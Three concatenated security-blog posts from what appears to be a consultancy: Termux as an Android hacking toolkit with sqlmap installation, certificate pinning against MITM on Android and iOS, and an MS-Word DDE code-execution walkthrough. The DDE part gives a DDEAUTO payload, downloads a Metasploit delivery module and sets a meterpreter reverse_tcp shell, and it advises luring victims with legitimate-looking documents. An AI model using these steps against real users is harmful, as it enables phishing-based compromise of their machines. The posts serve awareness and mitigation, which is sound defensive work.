How your employee’s smartphones are serious threat to your organization?

HOW YOUR EMPLOYEE’S SMARTPHONES ARE SERIOUS THREAT TO YOUR ORGANIZATION?

Employee’s smartphones are a serious threat to the organization since it is allowed to use in the production environment. Android is the most popular mobile OS with more than 60% market share. As Android is ruling smartphone and tablet markets, developers are also creating more apps for Android devices. This is the reason why the Android market has millions of apps. Like websites, apps also need penetration testing to check for various vulnerabilities. Security testing for Android apps will need to have a penetration testing environment on your Android device.

Almost all Useful Hacking Tools, Scripts can be used on Your Android Mobile. Termux is a Powerful app which can be used to install useful packages, Hacking Tools On your Android

By installing this program, you can hack anything that comes to mind. From targeting websites, hacking computers, sniffing networks, brute forcing passwords, information gathering and many more.

For more details about termux can be found in their official termux page. Link for the has given below

https://wiki.termux.com/wiki/Main_Page

Installation

Google Play: https://play.google.com/store/apps/details?id=com.termux
F-Droid: https://f-droid.org/packages/com.termux/

INSTALLING PACKAGES FROM THE REPOSITORY

To install your favorite tool in termux you can run

pkg install <package name>
Example
pkg install nmap 
To get list of available packages in termux, run
pkg list-all
To search a package
pkg search nmap
To show more info about a package
pkg show nmap

INSTALLING .DEB FILES

Manual way of installing .deb files

pkg install ./package.deb

or

dpkg -i ./package.deb

Termux packages are built using Ubuntu 16.10, so this means that developers can compile any existing software from their machine and then add it to the package manager for anyone to download. It is a very simple and elegant solution to what otherwise could be a complex and difficult problem. One amazing side effect of this is that once the software is compiled, you have full-fledged versions of the software rather than half-baked, ported versions of desktop Linux packages.

Termux gives you a bash terminal by default, but if you are like me and prefer Zsh for its advanced features, the FISH shell is also available. Multiple different shell types are certainly welcome.

Anyone that has used a terminal emulator application on Android knows the pain when you need to enter special keys to control the terminal such as CTRL or ESC. These keys aren’t displayed on the standard touch keyboards used on android devices (save for Hacker Keyboard). Termux developer Fredrik Fornwall, though, has a very novel solution to this. He has bound CTRL to the Volume DOWN key and other special keys like ESC to the Volume UP key. Therefore, by pressing Volume Up + the touch keyboard ‘L’ you can input the terminal command CTRL + ‘L’ which clears the terminal window. The ESC key is sent by pressing volume UP + ‘E’ key for example. You can view all the keys available in Termux on the developer’s website

FEATURES OF TERMUX API

Secure. Access remote servers using the ssh client from OpenSSH. Termux combines standard packages with accurate terminal emulation in a beautiful open source solution.

Feature packed. Take your pick between Bash, fish or Zsh and nano, Emacs or Vim. Grep through your SMS inbox. Access API endpoints with curl and use rsync to store backups of your contact list on a remote server.

Customizable. Install what you want through the APT package management system known from Debian and Ubuntu GNU/Linux. Why not start with installing Git and syncing your dotfiles?

Explorable. Have you ever sat on a bus and wondered exactly which arguments tar accepts? Packages available in Termux are the same as those on Mac and Linux – install man pages on your phone and read them in one session while experimenting with them in another.

With batteries included. Can you imagine a more powerful yet elegant pocket calculator than a readline-powered Python console? Up-to-date versions of Perl, Python, Ruby, and Node.js are all available.

Ready to scale up. Connect a Bluetooth keyboard and hook up your device to an external display if you need to – Termux supports keyboard shortcuts and has full mouse support.

Tinkerable. Develop by compiling C files with Clang and build your own projects with CMake and pkg-config. Both GDB and storage are available if you get stuck and need to debug.

term up has a list of command, all those can be found at link given

https://github.com/termux/termux-packages/blob/master/packages/command-not-found/commands.h

INSTALL SQLMAP

Let’s do a practical session on how to install sqlmap on our android device.

As we know that sqlmap is a most amazing website vulnerability scanning tool which is mostly used by pen testers, Hackers, Security Researchers and so on.

Sqlmap is written in Python programming language environment, so that we need to have python installed in termux ,to install python in termux, run the command

pkg install python2

once the installation is complete, we need to install git package because we are going to download sqlmap from the git repository

to install git in termux

run the command :

pkg install git

now its time to install our favorite tool sqlmap

so run: git clone https://github.com/sqlmapproject/sqlmap.git

  the download process and the installation process will take some time, once it’s been done

then navigate to the sqlmap directory using the following command

cd

then list the files using ls command

now navigate to the sqlmap-dev folder using “cd sqlmap-dev”

once you entered into the folder, list the files using ls command

so you will see the executable file of sqlmap

since sqlmap run under python, so we need to run using the following command

python2 sqlmap.py

bingo … now we have successfully installed sqlmap on our android device itself. Using the same method we can able install different tools on our android device.

Termux: Hackers Perspective

Before termux was originated, hackers were using so many application to perform different attacks. But now everything has come into single app, which is termux. Now this the time where hackers will take over every system easily.

Hackers install Kali Linux on their android phone but it requires some time and patient, but this app looks alternative for the kali.

So now hackers got the best handy tool. Hackers can able to get into your network and he/she can able to perform post exploitation techniques such as MITM, exploitation, etc.

Mitigation from hackers attacks

• The users need to take necessary precautions in order to protect their devices, as the hackers can exploit any network using termux without the knowledge of the user.
• Patch anything and everything. Keep in mind that your secure environment from a month ago is now wide open thanks to Patch Tuesday
• The second Tuesday of each month when Microsoft releases security patches.
• Some months there are in excess of 30 patches released. That’s 30 potential vulnerabilities. Miss a month … 60 … two months … 120. Hackers are always finding new attack holes and methods into the system software.
• Patches and new versions of system software are frequently released to fix these newfound problems.
• Hackers are a close-knit community and they are more than willing to share your network’s flaws with their neighbors.

Be prepared and Be secured!!!

Author

Venkatesh C>S
Security Engineer

BriskInfosec Technology and consulting PVT LTD

Follow me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/

MAN IN THE MIDDLE ATTACK ON MOBILE APPLICATIONS

MAN IN THE MIDDLE ATTACK ON MOBILE APPLICATION BECOMES SERIOUS THREAT

WHAT IS MAN IN THE MIDDLE ATTACK?

Man in the middle attacks (MITM) is one of the attacks where the attacker interrupts between the sender and receiver and gathers the sensitive data. MITM attacks, which are a form of session hijacking are not new. However, what might not be known is that mobile devices are vulnerable to MITM attacks too. It is quite complex for the attacker to inject the MITM attack on mobile applications than on web applications.

HOW DOES A MAN-IN-THE-MIDDLE ATTACK WORK?

A man-in-the-middle attack (MITM) is like eavesdropping. Data is sent from point A (Mobile) to point B (server/website), and an attacker can get in-between these transmissions. They then set up tools programmed to “listen in” on transmissions, intercept data that is specifically targeted as valuable, and capture the data. Sometimes this data can be modified in the process of transmission to try to trick the end user to expose sensitive information, such as login credentials. Once the user has fallen into the trap, the data is collected from the target, and the original data is then forwarded to the planned destination unaltered.

MAN IN THE MIDDLE ATTACK ON MOBILE APPLICATIONS

For mobile apps to prevent these types of attacks it is important to look at how the mobile app performs authentication. Using certificate pinning within the mobile app helps ensure that the mobile app is communicating with the device it is expecting to communicate with.

TYPES OF MITM ATTACKS

• ARP Poisoning
• DNS Spoofing
• Port stealing
• Invisible Proxy
• Certificate Forgeing

In this blog, we will discuss the major attack (SSL PINNING)

SSL PINNING

Certificate pinning is hard-coding the certificate known to be used by the server in the mobile application. The app can then ignore the device’s trust store and rely on its own, and allow only SSL connections to hosts signed with certificates stored inside the application.

The client makes a connection to the server and the server responds with its SSL certificate. If that certificate was issued by a Certificate Authority that is trusted by the OS, then the connection is allowed.

 CERTIFICATE PINNING FOR ANDROID AND IOS APPS

When we, developers, are working in the development of any kind of software, we can’t forget about security. The minimum security measure we should use is HTTPS as the protocol to share information between a client (in this case, an Android/iOS app) and a server, followed by an updated cryptographic protocol like TLS 1.2 (SSL 3.0 is vulnerable!)

You may think that using an HTTPS is enough but in some cases like banking applications, where sensitive data may be sent between our client and our server, could be risky.

By default, when making a TLS connection, the client check two things:

• The server’s certificate matches the requested hostname.
• The server’s certificate has a chain of truth back to a trusted root certificate.

What it doesn’t do is check, if the certificate is the specific certificate you know your server is using, and that’s a possible security vulnerability, if the client is compromised and an unsafe certificate is installed(certificate forging), someone could do a man-in-the-middle attack.

Root CA, intermediate CA and Medium certificate

The solution to this problem is certificate pinning. Storing a certificate on our client application to ensure that any SSL request made matches the server’s certificate provided by a trusted CA (certificate authority). Let us see how to do it on both Android and iOS apps.

ANDROID

OkHttp lib provides a CertificatePinner class to be added to an OkHttpClient instance. The easiest way to pin a host is turned on pinning with a broken configuration and read the expected configuration when the connection fails.

CertificatePinner certificatePinner = new CertificatePinner.Builder()
          .add("mydomain.com", "sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=")
          .build();
      OkHttpClient client = OkHttpClient.Builder()
          .certificatePinner(certificatePinner)
          .build();

After a request is executed, you’ll see this message on the console:

javax.net.ssl.SSLPeerUnverifiedException: Certificate pinning failure!
    Peer certificate chain:
      sha256/afwiKY3RxoMmLkuRW1l7QsPZTJPwDS2pdDROQjXw8ig=: CN=mydomain.com, OU=PositiveSSL
      sha256/klO23nT2ehFDXCfx3eHTDRESMz3asj1muO+4aIdjiuY=: CN=COMODO RSA Secure Server CA
      sha256/grX4Ta9HpZx6tSHkmCrvpApTQGo67CYDnvprLg5yRME=: CN=COMODO RSA Certification Authority
      sha256/lCppFqbkrlJ3EcVFAkeip0+44VaoJUymbnOaEUk7tEU=: CN=AddTrust External CA Root
    Pinned certificates for mydomain.com:
      sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
    at okhttp3.CertificatePinner.check(CertificatePinner.java)
    at okhttp3.Connection.upgradeToTls(Connection.java)
    at okhttp3.Connection.connect(Connection.java)
    at okhttp3.Connection.connectAndSetOwner(Connection.java)

The exception will provide you the server’s certificate public key hashes. Paste them on the CertifinatePinner and done! Once the certificate pinner function is enabled in the Android app it will have protection against        SSL MITM attacks

CertificatePinner certificatePinner = new CertificatePinner.Builder()
        .add("mydomain.com", "sha256/afwiKY3RxoMmLkuRW1l7QsPZTJPwDS2pdDROQjXw8ig=")
        .add("mydomain.com", "sha256/klO23nT2ehFDXCfx3eHTDRESMz3asj1muO+4aIdjiuY=")
        .add("mydomain.com", "sha256/grX4Ta9HpZx6tSHkmCrvpApTQGo67CYDnvprLg5yRME=")
        .add("mydomain.com", "sha256/lCppFqbkrlJ3EcVFAkeip0+44VaoJUymbnOaEUk7tEU=")
        .build();

IOS

The iOS solution is not so straightforward because you need to store the certificate itself inside your app. In my case, I’ve used Alamofire as HTTP client lib for Swift.

First, you need to get the server’s certificate in .der format and add it to your iOS project.

openssl s_client -showcerts -server name mydomain.com -connect mydomain.com:443 </dev/null | openssl x509 -outform DER > mydomainCert.der

And now, let’s enable certificate pinning: to do it we need both ServerTrustPolicy and SessionManager objects. The first one will define the hostname and certificates that will be used in the process:

var serverTrustPolicies = [
     "mydomain.com": .pinCertificates(
     certificates: ServerTrustPolicy.certificates(),
     validateCertificateChain: true,
     validateHost: true
   ),
 ]

ServerTrustPolicy.certificates() will return all stored certificates and the booleans will validate the certificate chain and the hostname.

Lastly, create a SessionManager object using this trust policies:

var sessionManager = SessionManager(serverTrustPolicyManager: ServerTrustPolicyManager(policies: serverTrustPolicies!))

Done! Just use this sessionManager object to execute request

sessionManager.request(“https://mydomain.com/api”, method: .get, headers: headers)…

Conclusion:

Since MITM attacks are stealthier and it does not need any physical access to the victim device, a robust protection mechanism is required to prevent it. Hence SSL pinning is a much needed robust protection as it protects the application against MITM attacks by only allowing the connections to the server based on the trusted CA certificates.

MS-OFFICE DDE Code Execution Vulnerability

BEWARE OF MS-OFFICE DDE CODE EXECUTION VULNERABILITY

INTRODUCTION:

DDE (Dynamic Data Exchange) protocol is an inbuilt feature in Microsoft Windows Applications used for the exchange of dynamic data between the applications. DDE protocol sends messages between the applications that share data and uses shared memory to exchange data between applications.
There are many applications available which use DDE feature which includes MS-Word and office 365, visual basic etc..,

DDE VULNERABILITY AND CODE EXECUTION:

For Data transfer between the applications, DDE work by executing the application, that will provide the data. If an attacker can inject a malicious code inside the DDE object field of the application (In our example we use MS-word), the attacker can execute code within the word document or excel sheet. Another advantage for the attacker is, unlike other client-side code execution attacks that use a malicious doc file which when opened, prompts the victim to enable macros in order to run the malware, these DDE exploits don’t need the victim to enable macros feature in his ms-word application. When the malicious doc is opened, it simply throws an error dialog box to the victim, which most of the users will click ‘OK’ and they will ignore it. Hence there is a higher chance for the attackers to gain access to victim machine by using this vulnerability.

Since DDE is an inbuilt feature, the malicious document cannot be identified as a threat by any Anti-virus software or windows defender. This is another big advantage for the attacker and hackers.

In this article, we will look at a demo starting with a simple code execution example by using DDE vulnerability to a complete compromise of a victim system using Metasploit.

SIMPLE CODE EXECUTION IN MS-WORD:

In MS-Word (All versions are vulnerable), open a blank new document or we can use an existing document for legitimacy purpose which will be helpful for luring the victim to believe that the document is legitimate and trusted. For our example, I’m using a blank document.

In the blank document, go to insert tab → Quick parts → Field

Fig.1 Blank Document

In the Field dialog box, select Formula option to insert our DDE exploit code.

Fig.2 Insertion in Formula option

After that, you should see a Field inserted into the document with an error “!Unexpected End of Formula”, right-click the Field, and choose Toggle Field Codes. we need to craft a DDE Object payload in the text field, which will start the malware or any code of our choice when the document is opened.

Fig.3

In the text field, insert the following code for executing notepad.exe when the document is opened.

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k notepad.exe"}

The DDEAUTO keyword is to inform Ms Word that this is a DDE field, and will auto execute when the document is opened, the second part is the full path of the executable to execute, and the last part between quotes are the arguments to pass to this executable (execute notepad.exe).

Fig.4

After that save the document as any name. Once the victim opens the doc, notepad.exe is executed after 2 error messages.

Fig.6

After these two errors, which most of the users will ignore, notepad gets executed without any macros.

Fig.7

In this way, an attacker can execute malicious code without any user interaction to take full system control.

SYSTEM COMPROMISE USING DDE EXPLOIT IN METASPLOIT:

Since the makers of Metasploit has not released the exploit in its update, we will get the exploit from outside and import it to Metasploit database. Download the exploit using command

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

After that just move the exploit dde_delivery.rb to use/share/Metasploit-framework/modules/exploit/windows directory. After that open msfconsole and reload the database using command reload_all.

After the exploit is loaded in Metasploit, we can use it to exploit our victim. In msfconsole set the below command parameters.

Use exploit/windows/dde_delivery
 set SRVHOST
 set payload windows/meterpreter/reverse_tcp
 set LHOST
 set LPORT
 exploit

Fig.8

Once we give the exploit command, it will generate a DDE exploit payload. We need to copy it paste it to the DDE formula field that is described in above example.

Fig.9

Save the document and send it to the victim. Once the victim opens the document and ignores the error, we will get the remote system access via meterpreter shell.

Fig.10

Once we get the shell, we can interact with sessions – I command.

Fig.11

In this way, attackers can compromise the system without any knowledge of users and also without triggering any alerts from the firewall. Microsoft has released some initial patches for this vulnerability.

MITIGATION FOR DDE VULNERABILITY:

1. Install windows security updates regularly.
2. Double the error messages while opening any msoffice documents instead of blindly clicking on OK button.
3. Do not open any unnecessary email attachments.
4. Use an up to date anti-virus and firewall software.
5. Disable DDE feature in windows registry by using the key

{HKEY_CURRENT_USER\Software\Microsoft\Office\\Excel\Security} workbooklinewarnings(DWORD)=2

Since DDE is a Microsoft’s genuine feature, most antivirus solutions do not flag any warning or block MS Office documents with DDE fields. The best way to protect yourself from such attacks is always to be suspicious of any uninvited document sent via an email and never click on links inside those documents unless adequately verifying the source.

RiskInfosec provides the world’s best security solutions. For Best Security Solutions reach us @ Contact@briskinfosec.com.

REFERENCES:

1) https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
2) https://technet.microsoft.com/en-us/library/security/4053440.aspx

AUTHOR

Dawood Ansar

Security Engineer

BriskInfosec Technology and consulting  PVT LTD

FInd me @https://www.linkedin.com/in/dawood-ansar-29403213b/